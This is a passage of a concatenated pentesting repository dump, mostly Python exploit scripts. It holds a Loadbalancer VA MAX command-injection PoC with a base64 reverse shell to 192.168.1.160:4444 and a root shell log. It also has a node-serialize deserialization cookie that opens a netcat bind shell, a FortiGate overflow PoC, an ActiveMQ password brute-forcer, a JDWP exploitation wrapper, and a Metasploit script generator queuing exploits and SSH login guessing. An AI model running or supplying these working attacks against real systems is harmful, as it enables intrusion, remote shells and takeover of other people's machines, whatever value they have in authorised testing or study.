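            logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, pwd), timeout=15)
            if 'ActiveMQ Console' in logme.text:
                print OKGREEN + ' [+] admin user logged-in! :D  (%s : %s)' % (our_user, pwd) + ENDC
                break
        else:
            print FAIL + ' [-] no password from %s worked for %s\n' % (pwd_file, our_user) + ENDC

    except requests.exceptions.RequestException:
        print FAIL + ' [-] Can not connect to remote ActiveMQ panel :C\n' + ENDC

    print '' + BOLD
    print ' [+] path 13a: testing activemq - admin panel' + ENDC
    print ''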
66 |
67 |
68 | # send msg to remote MQ
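def sender():
    """Path 13b: publish one STOMP message to a queue on the broker.

    Connects to <target>:<port>, logs in with the given user/password and
    sends 'msg from pentester ;)' to the chosen destination (e.g.
    /queue/test1).  The port is converted to int before it reaches stomp.py,
    so a typo is reported here rather than from inside the socket layer.
    """
    print OKGREEN + ' [+] path 13b: testing activemq - admin panel' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    # NOTE(review): 61616 (the original hint) is ActiveMQ's OpenWire port;
    # the STOMP connector usually listens on 61613 -- confirm on the target.
    port = raw_input(' set port: ')
    username = raw_input(' set user: ')
    passwd = raw_input(' set password: ')
    our_queue = raw_input(' set queue: ')  # /queue/test1
    print ENDC

    try:
        port_no = int(port)
    except ValueError:
        print FAIL + ' [-] port must be a number, got %r\n' % (port) + ENDC
        return

    try:
        conn = stomp.Connection([(target, port_no)])
        conn.start()
        print OKGREEN
        print ' [+] connecting to %s on port %s' % (target, port_no)
        print ENDC
        print ' [i] now trying to log in...'

        print OKGREEN
        # NOTE(review): wait=False returns before the broker answers the CONNECT
        # frame, so a rejected login is never reported here and the send below
        # may race it.  wait=True makes stomp.py raise ConnectFailedException on
        # an ERROR reply but can block if the broker never answers -- choose one
        # deliberately.
        conn.connect(username, passwd, wait=False)
        print ENDC

        conn.send(our_queue, 'msg from pentester ;)')
        conn.disconnect()

    except stomp.exception.ConnectFailedException:
        print FAIL + ' [-] Can not connect to remote MQ, sorry :C\n' + ENDC

    print '' + BOLD
    print ' [+] path 13b: testing activemq - admin panel' + ENDC
    print ''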
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path12.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # quick poc for postauth rce bug in va max 8.3.4
3 | #
4 | # more:
5 | # https://code610.blogspot.com
6 | #
7 | # 10.02.2019
8 | #
9 |
10 | # p.s.
11 | #
12 | # listening on [any] 4444 ...
13 | # 192.168.1.126: inverse host lookup failed: Unknown host
14 | # connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
15 | # sh: no job control in this shell
16 | # sh-4.1$ id
17 | # id
18 | # uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
19 | # sh-4.1$ cat /etc/shadow
20 | # cat /etc/shadow
21 | # cat: /etc/shadow: Permission denied
22 | # sh-4.1$
23 | # (...)
24 | # sh-4.1$ sudo -l
25 | # sudo -l
26 | # Matching Defaults entries for apache on this host:
27 | # syslog_goodpri=debug, env_reset,
28 | # secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
29 | #
30 | # User apache may run the following commands on this host:
31 | # (ALL) NOPASSWD: ALL
32 | # sh-4.1$ sudo su
33 | # sudo su
34 | # id
35 | # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
36 | # head -n1 /etc/shadow
37 | # root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
38 | #
39 | #
40 |
41 | #* prepared for enlil-v0.2 (02.06.2019@21:36)
42 |
43 |
44 | # o/
45 |
46 | # --- imports ---
47 | import datetime, time
48 | import requests
49 | from requests.auth import HTTPBasicAuth
50 | import subprocess
51 | import re
52 |
53 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
62 |
def getrce():
    """Path 12: post-auth command injection PoC for Loadbalancer.org VA MAX 8.3.4.

    Flow: basic-auth to http://<target>:<port>/, look for the 'Load Balancer
    Administration System' banner, then POST the interface-configuration
    form to /lbadmin/config/changeip.php with a shell payload appended to the
    `mtu_eth0` field.  The payload is a base64-encoded python reverse shell
    that connects back to 192.168.1.160:4444 (decoded from the blob below);
    start a listener there first, or change the address.

    WARNING (read before running): the form also submits `eth0` =
    192.168.1.126/24, hard-coded from the author's lab.  Given the endpoint
    (changeip.php?action=modip, 'Configure Interfaces') that value is
    presumably applied as the appliance's new eth0 address together with the
    injected MTU, so on any other target it will most likely re-address the
    box and cut it off the network -- set it to the target's *current*
    address.  Other things the visible code leaves open: requests have no
    timeout, the responses (logmeresp, getmeresp, shResp) are never
    inspected, and a failed login is not reported (there is no else branch).
    """
    # defines
    dateTime = datetime.datetime.now()
    timestamp = int(time.mktime(dateTime.timetuple()))  # only used as the `t=` query parameter

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ') # 9080?

    remote_host = 'http://' + target + ':' + port # 192.168.1.126:9080'
    our_user = raw_input(' set user: ') # 'loadbalancer'
    our_passwd = raw_input(' set passwd: ') # 'loadbalancer'
    print ENDC + '\n'
    # go -- plain HTTP: the credentials travel in clear text
    sess = requests.session()
    logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
    logmeresp = logme.text

    print OKGREEN
    print '\n\t[+] small poc for VA MAX 8.3.4\n' + ENDC + BOLD
    # based on:
    # https://raw.githubusercontent.com/c610/tmp/master/postauth-rce-poc.py

    # try to log in (no else branch: a failed login silently skips the exploit)
    if 'Load Balancer Administration System' in logmeresp:
        print ' [+] using credentials: %s : %s' % ( our_user, our_passwd )
        print ' [+] our timestamp: %s' % ( timestamp )
        print ' [+] proceed.' + ENDC

        # priming GET of the form page; its body (getmeresp) is not used
        getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
        dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
        getmeresp = dogetme.text
        # "h4x;" terminates the preceding shell word, the base64 decodes to
        # `python -c '...'` opening a reverse shell to 192.168.1.160:4444, and
        # ";#" comments out whatever the script appends after the MTU value.
        # NOTE(review): the blanks inside the blob look like line-wrapping from
        # this listing -- `base64 -d` rejects embedded spaces -- confirm the
        # literal against the upstream file.
        payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"

        #payload = "h4x;telnet 192.168.1.160 4444;#"
        #payload = ';id>/tmp/id.id.id'
        # print '[i] using payload:', payload

        data_req = {
            'eth0' : '192.168.1.126/24',   # hard-coded lab address -- see WARNING in the docstring
            'mtu_eth0' : '1500' + payload, # injection point: MTU value followed by the shell payload
            'eth1' : '',
            'mtu_eth1' : '1500',
            'eth2' : '',
            'mtu_eth2' : '1500',
            'eth3' : '',
            'mtu_eth3' : '1500',
            'go' : 'Configure+Interfaces'
        }
        shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
        shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
        shResp = shellWe.text  # not inspected; success is only visible on the listener
    print OKGREEN
    # check sudo -l now :>
    print '\n\nThanks.Bye.\n' + ENDC
118 |
119 |
120 |
121 |
122 |
123 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path13.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path13: testing activemq - admin panel
3 | #
4 | # based on:
5 | # https://raw.githubusercontent.com/c610/tmp/master/actlikeMQ.py
6 | #
7 | # detailed tutorial:
8 | # https://www.youtube.com/watch?v=CD-E-LDc384
9 | #
10 | # current:
11 | # - bf
12 | # - sender
13 |
14 | # --- imports ---
15 | import subprocess
16 | import re
17 | import sys
18 | import requests
19 | from requests.auth import HTTPBasicAuth
20 | from stomp import * # for STOMP protocol
21 | import stomp
22 |
23 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
32 |
33 |
34 |
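def bfadmin():
    """Path 13a: dictionary attack on the ActiveMQ web console (user `admin`).

    Every word of /usr/share/wordlists/dirb/common.txt is tried as the admin
    password over HTTP basic auth against http://<target>:<port>/admin/; a
    hit is recognised by 'ActiveMQ Console' in the response body.

    Changes over the original: the matching password is printed (it used to
    be discarded), the function returns instead of sys.exit()-ing the whole
    menu, a missing wordlist and network errors are reported, an exhausted
    wordlist says so, and every request carries a timeout so a stalling
    host cannot hang the loop.  This sends thousands of failed logins --
    noisy and easily rate-limited; only run it where that is in scope.
    """
    print OKGREEN + ' [+] path 13a: testing activemq - admin panel' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    print ENDC

    remote_host = 'http://' + target + ':' + port + '/admin/'
    our_user = 'admin'
    pwd_file = '/usr/share/wordlists/dirb/common.txt'

    try:
        with open(pwd_file, 'r') as read_pwds:
            pwds = [line.rstrip() for line in read_pwds]
    except IOError as e:
        print FAIL + ' [-] cannot read wordlist %s: %s\n' % (pwd_file, e) + ENDC
        return

    sess = requests.session()
    try:
        for pwd in pwds:
            logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, pwd), timeout=15)
            if 'ActiveMQ Console' in logme.text:
                print OKGREEN + ' [+] admin user logged-in! :D  (%s : %s)' % (our_user, pwd) + ENDC
                break
        else:
            print FAIL + ' [-] no password from %s worked for %s\n' % (pwd_file, our_user) + ENDC

    except requests.exceptions.RequestException:
        print FAIL + ' [-] Can not connect to remote ActiveMQ panel :C\n' + ENDC

    print '' + BOLD
    print ' [+] path 13a: testing activemq - admin panel' + ENDC
    print ''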
69 |
70 |
71 | # send msg to remote MQ
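def sender():
    """Path 13b: publish one STOMP message to a queue on the broker.

    Connects to <target>:<port>, logs in with the given user/password and
    sends 'msg from pentester ;)' to the chosen destination (e.g.
    /queue/test1).  The port is converted to int before it reaches stomp.py,
    so a typo is reported here rather than from inside the socket layer.
    """
    print OKGREEN + ' [+] path 13b: testing activemq - admin panel' + ENDC
    print ''

    print BOLD
    target = raw_input(' set target: ')
    # NOTE(review): 61616 (the original hint) is ActiveMQ's OpenWire port;
    # the STOMP connector usually listens on 61613 -- confirm on the target.
    port = raw_input(' set port: ')
    username = raw_input(' set user: ')
    passwd = raw_input(' set password: ')
    our_queue = raw_input(' set queue: ')  # /queue/test1
    print ENDC

    try:
        port_no = int(port)
    except ValueError:
        print FAIL + ' [-] port must be a number, got %r\n' % (port) + ENDC
        return

    try:
        conn = stomp.Connection([(target, port_no)])
        conn.start()
        print OKGREEN
        print ' [+] connecting to %s on port %s' % (target, port_no)
        print ENDC
        print ' [i] now trying to log in...'

        print OKGREEN
        # NOTE(review): wait=False returns before the broker answers the CONNECT
        # frame, so a rejected login is never reported here and the send below
        # may race it.  wait=True makes stomp.py raise ConnectFailedException on
        # an ERROR reply but can block if the broker never answers -- choose one
        # deliberately.
        conn.connect(username, passwd, wait=False)
        print ENDC

        conn.send(our_queue, 'msg from pentester ;)')
        conn.disconnect()

    except stomp.exception.ConnectFailedException:
        print FAIL + ' [-] Can not connect to remote MQ, sorry :C\n' + ENDC

    print '' + BOLD
    print ' [+] path 13b: testing activemq - admin panel' + ENDC
    print ''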
106 |
107 |
--------------------------------------------------------------------------------
/enlil-v0.2/files/path14.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # path14: testing jdwp
3 | #
4 | # detailed tutorial:
5 | # https://www.youtube.com/watch?v=VNj46axj9qM
6 | #
7 | # current:
8 | # - gotleak
9 | #
10 |
11 | # --- imports ---
12 | import subprocess
13 | import re
14 | import requests
15 |
16 | # --- super colours ---
# ANSI SGR escape sequences used for the interactive output.  They are printed
# unconditionally (no isatty() check), so redirected output keeps the raw
# escape bytes.
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
25 |
26 |
27 |
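def gotleak():
    """Path 14: run IOActive's jdwp-shellifier against an exposed JDWP port.

    The PoC comes from /tmp/jdwp-shellifier.py, a path you type, or a fresh
    download from GitHub; it is then run with `--break-on
    java.lang.String.indexOf` against <target>:<port> and its stdout goes to
    /tmp/jwdp-enum-<target>.log, which is echoed afterwards (the original
    announced "checking results" but never showed them).

    Both external commands are started from argv lists: operator-typed
    host, port and paths are never interpreted by a shell, and the log
    redirect is done with stdout= rather than a shell '>'.  The download is
    made WITH TLS verification -- the file is executed right afterwards, and
    the original --no-check-certificate would have let an on-path attacker
    substitute the code we run.
    """
    print OKGREEN + ' [+] path 14: get some info from unauthorized JDWP' + ENDC
    print ''
    print ' based on: https://github.com/IOActive/jdwp-shellifier\n'

    grab_or_not = raw_input(' using tool [local/wget]: ')
    print '\n' + ENDC

    pocpath = '/tmp/jdwp-shellifier.py'  # for 'default'
    poc_url = 'https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-shellifier.py'

    if grab_or_not == 'wget':
        try:
            rc = subprocess.call(['wget', poc_url, '-O', pocpath])
        except OSError:
            rc = -1  # wget itself is not installed
        if rc == 0:
            print '' + OKGREEN
            print ' poc should be ready to configure...' + ENDC
        else:
            print FAIL + ' [-] could not download the poc (wget rc=%s)' % (rc) + ENDC
            return

    elif grab_or_not == 'local':
        print ' [1] /tmp/jdwp-shellifier.py ("default")'
        print ' [2] < /full/path2/po.c >'

        choice = raw_input(' [1/2]: ? ')
        if choice == '1':
            pocpath = '/tmp/jdwp-shellifier.py'
        elif choice == '2':
            print BOLD
            pocpath = raw_input(' type full path to jdwp-shellifier.py >> ')
            print ENDC

    print BOLD
    target = raw_input(' set target: ')
    port = raw_input(' set port: ')
    logfile = '/tmp/jwdp-enum-' + target + '.log'
    print ENDC

    runjwp = ['python', pocpath, '--port', port, '-t', target,
              '--break-on', 'java.lang.String.indexOf']
    try:
        with open(logfile, 'w') as out:
            subprocess.call(runjwp, stdout=out)  # stderr still goes to the terminal
    except (OSError, IOError) as e:
        print FAIL + ' [-] could not start the poc: %s' % (e) + ENDC
        return

    print OKGREEN + '\n [+] poc finished, checking results:' + ENDC
    with open(logfile, 'r') as log:
        print '\n' + log.read()
    print ' [+] logfile saved to %s\n' % (logfile)

    print '' + BOLD
    print ' [+] path 14: unauthorized JDWP check - finished.' + ENDC
    print ''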
81 |
82 |
83 |
--------------------------------------------------------------------------------
/expRcEss_js.py:
--------------------------------------------------------------------------------
1 | root@nippur:/var/www/html/a# cat /home/c/ctf/tod/expRcEss_js.py
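#!/usr/bin/env python
# expRcEss_js.py - simple poc for CVE-2017-5941
#
# more details:
# https://nvd.nist.gov/vuln/detail/CVE-2017-5941
# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
# https://code610.blogspot.com/2019/03/temple-of-doom1-ctf.html
#
# 24.02.2019@22:00
#
# Usage: expRcEss_js.py <target> <port>
#
# Sends a base64-encoded node-serialize object in the `profile` cookie; its
# `_$$ND_FUNC$$_` function runs when the app deserialises the cookie.  The
# active payload is `nc -lvvp 4444 -e /bin/sh` ON THE TARGET (a bind shell):
# connect to <target>:4444 afterwards.  The commented-out cookies are the
# alternatives the comments describe (reverse shell to 192.168.1.160:4444,
# or a plain command batch).
import sys, requests

if len(sys.argv) != 3:
    sys.stderr.write('usage: %s <target> <port>\n' % (sys.argv[0]))
    sys.exit(1)

target = sys.argv[1]
target_port = sys.argv[2]

sess = requests.session()

check_url = 'http://' + target + ':' + target_port
print '[i] Connecting to %s on port %s' % (target, target_port)

try:
    check_req = sess.get(check_url, timeout=15)
except requests.exceptions.RequestException as e:
    print '[-] could not reach %s: %s' % (check_url, e)
    sys.exit(1)
# .get(): a missing X-Powered-By header used to raise KeyError before the check below
found_headers = check_req.headers.get('X-Powered-By', '')

if 'Express' in found_headers:
    print '[+] Node.js Express identified by headers; proceeding...'

    print '[i] Creating final request'
    # nc ip 4444 -e /bin/sh
    #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xNjAgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXRvLGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pO30oKSJ9"
    # nc -lvvp 4444 -e /bin/sh
    #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIC1sdnZwIDQ0NDQgLWUgL2Jpbi9zaCAmJywoZSxvdXRvLGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pO30oKSJ9"
    profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbmMgLWx2dnAgNDQ0NCAtZSAvYmluL3NoJywgZnVuY3Rpb24oZXJyb3IsIHN0ZG91dCwgc3RkZXJyKSB7IGNvbnNvbGUubG9nKHN0ZG91dCkgfSk7fSgpIn0KCg=="
    #profile_cookie = "eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnaWQ7bHM7cHdkO3dob2FtaTt1bmFtZSAtYScsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9Cgo="

    profile_cookies = {'profile': profile_cookie}
    print profile_cookies

    try:
        fin_req = sess.get(check_url, cookies=profile_cookies, timeout=30)
    except requests.exceptions.RequestException as e:
        # the payload may already have fired even if the reply never came back
        print '[-] request with payload failed: %s' % (e)
        sys.exit(1)

    print '[+] shell should be ready now.'
    print fin_req.text

else:
    print '[-] no "Express" in X-Powered-By (%r); not sending the payload' % (found_headers)

print '\n[+] poc finished.'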
50 |
51 |
--------------------------------------------------------------------------------
/fantamorph-01-ex-0x3eda38dc.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/fantamorph-01-ex-0x3eda38dc.zip
--------------------------------------------------------------------------------
/fiddler bug.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/fiddler bug.zip
--------------------------------------------------------------------------------
/forteagate.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # forteanet.py - quick poc for fortigate vm httpsd overflow
3 | # found: 23:20 @ 09.09.2019
4 | # skeleton : 03:18 @ 10.09.2019
5 | # code610 blogspot com
6 | #
7 |
8 | import sys, re, requests, json
9 |
10 | # presets
target = 'http://' + sys.argv[1]   # IndexError when no argument is given; scheme is forced to http://
user = 'admin'
passwd = 'P@ssw0rd'                # hard-coded test credentials: the PoC is post-authentication

# hello world
print '[+] checking FG VM appliance : %s' % ( target )

# log in to get session
session = requests.session()
initlink = target + '/ng/'

# verify=False turns off certificate validation for this one request; the
# later POSTs do not pass it (moot here, since target is built as http://)
initreq = session.get(initlink, verify=False, allow_redirects=True)
initresp = initreq.text
initcode = initreq.status_code

if initcode == 200:
    print '[+] found login page, trying (%s:%s)' % ( user, passwd )

    loglink = target + '/logincheck'
    logdata = {
        'ajax':1,
        'username':user,
        'secretkey':passwd,
        'redir':'%2Fng'
    }
    log = session.post(loglink, data=logdata, allow_redirects=True)
    logresp = log.text
    logheads = log.headers

    # KeyError if the reply carries no Set-Cookie header (likely when the login fails)
    headers = logheads['set-cookie']
    find_token = re.compile('ccsrftoken="(.*?)"')
    found_token = re.search(find_token, headers)

    if found_token:
        token = found_token.group(1)
        print '[+] found token: %s' % ( token )

        lastpost = target + '/api/v2/cmdb/router/static?datasource=1&with_meta=1'
        # fixed oversized pattern used as the route's 'dst' value
        siemka = 'A'* 216 + 'B'*6 + 'CC'

        # the CSRF token from the login cookie is echoed back in X-CSRFTOKEN
        headers2 = {'X-CSRFTOKEN':token, 'Content-type':'application/json'}
        #print headers2

        postdata = [{"dst":siemka,"device":{"name":"port10","real_interface_name":"port10","vdom":"root","is_system_interface":"true","status":"up","in_bandwidth_limit":0,"out_bandwidth_limit":0,"dynamic_addressing":"false","dhcp4_client_count":0,"dhcp6_client_count":0,"role":"undefined","mac_address":"00:0c:29:22:65:1a","link":"up","duplex":"half","supports_device_id":"true","valid_in_policy":"true","supports_fortitelemetry":"true","fortitelemetry":"false","is_used":"false","is_physical":"true","media":"rj45","is_aggregatable":"true","is_explicit_proxyable":"true","is_ipsecable":"true","is_routable":"true","tagging":[],"type":"physical","icon":"ftnt-interface-rj45-up","q_origin_key":"port10","interface-name":"port10","datasource":"system.interface","label":"port10","sortValue":0}}]

        try:
            dopost = session.post(lastpost, data=json.dumps(postdata), headers=headers2, allow_redirects=True)
            print dopost.text

        except requests.exceptions.ConnectionError, e:
            # a dropped connection is taken as the crash signal; the
            # appliance's own event log is the authoritative evidence
            print '[!] Connection reset; check log->events now.'
62 |
63 | # cheers
64 | # o/
65 |
66 |
--------------------------------------------------------------------------------
/getRes.js:
--------------------------------------------------------------------------------
// Same-origin path checker: each entry is requested synchronously and the
// HTTP status (200/404/403 only) is written into the document.
var ourTab = ['admin','administrator','robots.txt','somRandErr.file','joomla','wp-admin']
var req = new XMLHttpRequest();

for (var x = 0 ; x < ourTab.length ; x++){

    // third argument false => synchronous request, so `x` still holds the
    // current index when the handler below runs
    req.open('GET', ourTab[x], false);
    req.onreadystatechange = function() {
        // readyState is only tested for truthiness, not for DONE (4)
        // NOTE(review): the string literals below are split across a line
        // break in this listing (a markup tag was probably stripped);
        // confirm against the original file before running it
        if(req.readyState && req.status == 200) {
            document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
        }
        if (req.readyState && req.status == 404){
            document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
        }
        if (req.readyState && req.status == 403){
            document.write("Check : " + ourTab[x] + " -> Status: " + req.status + "
");
        }
    }
    req.send();



}
23 |
--------------------------------------------------------------------------------
/grabash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # grab-a-sh.py
3 | # version just1.
4 | # idea : 05082016
5 | # by code610
6 | #
7 |
8 | # imports
9 | import sys
10 | import subprocess
11 | import os
12 | import datetime # for 'now'
13 |
14 | # defines
target = sys.argv[1]   # host/IP under test; IndexError when omitted.  It is spliced
                       # unquoted into shell commands below (scan, moveRc) and used as a
                       # directory name, so keep it a plain host/IP.
pwd = os.getcwd()
allLogs = pwd + '/logs/'
tLogDir = allLogs + target + '/'    # per-target log directory
rcfile = tLogDir + 'msf.rc'         # RC file for the 1st msfconsole run (network modules)
rcwww = tLogDir + 'www.rc'          # RC file for the 2nd msfconsole run (www modules)
rcspool = tLogDir + 'output.msf'    # 'spool' target of the 1st run (see prepareEnv)
wwwspool = tLogDir + 'output.www'   # 'spool' target of the 2nd run
nmaplogfile = tLogDir + '/nmap-tcp-' + target + '.log'   # tLogDir already ends in '/', so the path contains '//'
now = datetime.datetime.now()
today = now.strftime("%d-%m-%Y %H:%M")
postfile = 'post.rc'
path2post = tLogDir + postfile      # meterpreter resource script written by makePost()
28 |
29 | # test functions:
30 | #
31 |
32 | # modules for default FTP (based on 21/tcp)
def check_21(target):
    """Queue the generic FTP scanner modules (anonymous, ftp_version) in the network RC file."""
    print ' + loading : current ftp modules'
    print ' + anonymous'
    print ''
    print ''

    ftp_scanners = (
        'auxiliary/scanner/ftp/anonymous',
        'auxiliary/scanner/ftp/ftp_version',
    )
    for module in ftp_scanners:
        saveNetRc('use ' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('run\n')
48 |
49 |
50 | # modules for Microsoft FTPd
def check_21_ms(target):
    """Queue the ms09_053 exploit module; called by readScan when the banner says 'Microsoft ftpd'.

    Exploit modules in this file are configured with RHOST (single host),
    the scanner modules with RHOSTS.
    """
    print ' + loading : current M$ ftp modules'
    print ' + ms09_053_ftpd_nlst' # if MS FTP found
    saveNetRc('use exploit/windows/ftp/ms09_053_ftpd_nlst\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')
57 |
58 | # modules for ProFTPD
def check_21_pftpd(target):
    """Queue the two ProFTPD exploit modules in the network RC file.

    NOTE(review): nothing in the visible readScan() dispatcher calls this
    function, and the first module is set up with RHOSTS while the second
    (and every other exploit entry in the file) uses RHOST.
    """
    print ' + loading : current ProFTPD modules'
    print ' + proftp_telnet_iac'

    saveNetRc('use exploit/freebsd/ftp/proftp_telnet_iac\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use exploit/linux/ftp/proftp_sreplace\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')
70 |
def check_21_pure(target):
    """Queue the Pure-FTPd exploit module in the network RC file.

    NOTE(review): not referenced by the visible readScan() dispatcher.
    """
    print ' + loading : current Pure-FTPd'
    print ' + pureftpd_bash_env_exec'
    saveNetRc('use exploit/multi/ftp/pureftpd_bash_env_exec\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')
77 |
78 |
79 | # modules for SSH
def check_22(target):
    """Queue the SSH modules for target in the network RC file.

    ssh_version and ssh_enumusers are scanners; ssh_login is an online
    password-guessing run (USERNAME root, PASS_FILE = the framework's
    default HTTP password list), which is noisy and shows up in the
    target's auth log.  Both wordlist paths are hard-coded.
    """
    print ' + loading : current ssh modules:'
    print ' + ssh_version'
    print ' + ssh_enumusers'
    print ' + ssh_login'
    saveNetRc('use auxiliary/scanner/ssh/ssh_version\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use auxiliary/scanner/ssh/ssh_enumusers\n')
    saveNetRc('set USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use auxiliary/scanner/ssh/ssh_login\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('set PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt\n')
    saveNetRc('set VERBOSE false\n')
    saveNetRc('set USERNAME root\n')
    saveNetRc('run\n')
100 |
101 | # modules for rpcinfo
def check_111(target):
    """Queue the portmapper and NFS-export scanners (no exploit modules) in the network RC file."""
    print ' + loading : current rpc modules:'
    print ' + sunrpc_portmapper'
    print ' + nfsmount' # TODO: check udp

    rpc_scanners = (
        'auxiliary/scanner/misc/sunrpc_portmapper',
        'auxiliary/scanner/nfs/nfsmount',
    )
    for module in rpc_scanners:
        saveNetRc('use ' + module + '\n')
        saveNetRc('set RHOSTS ' + target + '\n')
        saveNetRc('run\n')
113 |
114 | # modules for dcerpc
def check_135(target):
    """Queue the DCE-RPC modules for target in the network RC file.

    ms03_026_dcom is an exploit module (RHOST); the other three are
    scanners (RHOSTS).  sunrpc_portmapper is also queued by check_111, so a
    host with both 111 and 135 open runs it twice.
    """
    print ' + loading : current dcerpc modules:'
    print ' + ms03_026_dcom'
    print ' + sunrpc_portmapper'
    print ' + tcp_dcerpc_auditor'
    print ' + endpoint_mapper'

    saveNetRc('use exploit/windows/dcerpc/ms03_026_dcom\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use auxiliary/scanner/misc/sunrpc_portmapper\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')

    saveNetRc('use auxiliary/scanner/dcerpc/endpoint_mapper\n')
    saveNetRc('set RHOSTS ' + target + '\n')
    saveNetRc('run\n')
137 |
138 | # modules for Samba (139/tcp @Linux)
def check_139_lin(target):
    """Queue the Samba usermap_script exploit with a reverse-netcat payload.

    LHOST is whatever elhost() returns; that value likely still carries the
    trailing newline of the shell pipeline, so the RC line ends up as
    'set LHOST <ip>\\n\\n'.
    """
    print ' + loading : current samba modules:'
    print ' + usermap_script'
    saveNetRc('use exploit/multi/samba/usermap_script\n')
    saveNetRc('set RHOST ' + target + '\n')
    saveNetRc('set PAYLOAD cmd/unix/reverse_netcat\n')
    saveNetRc('set LHOST ' + str(elhost()) + '\n')
